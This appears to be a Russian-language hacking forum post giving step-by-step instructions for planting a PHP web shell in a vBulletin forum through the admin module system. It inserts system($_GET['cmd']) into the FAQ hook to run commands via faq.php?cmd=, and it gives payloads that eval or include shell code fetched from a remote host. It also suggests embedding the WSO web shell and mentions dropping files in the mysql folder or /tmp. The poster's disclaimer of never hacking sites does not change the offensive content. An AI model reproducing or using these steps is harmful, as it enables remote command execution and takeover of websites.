в дефолтной папке mysql (уже не помню какая) уже есть файл 1.php. Зачем тебе его искать? Можно в /tmp создать
PS в пм мне не надо писать, я не умею ломать сайты и никогда этим не занимался
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
cmd=eval(file_get_contents('http://site.ru/downloads/shell.txt'));
и
cmd=include($_GET['http://site.ru/downloads/shell.txt']);
не больше 60 кб - ничто не мешает вам туда вставить сразу код WSO
В таком случае форум выдает ошибку
(но шел востпроизводится)
Цитата:
Ваш запрос не может быть обработан, так как маркер безопасности отсутствует.
Если эта ошибка произошла после выполнения обычного действия и при повторном выполнении действий она не исчезает, то, пожалуйста, сообщите администратору об этом, не забыв указать максимально полное описание действий, которые привели к её возникновению.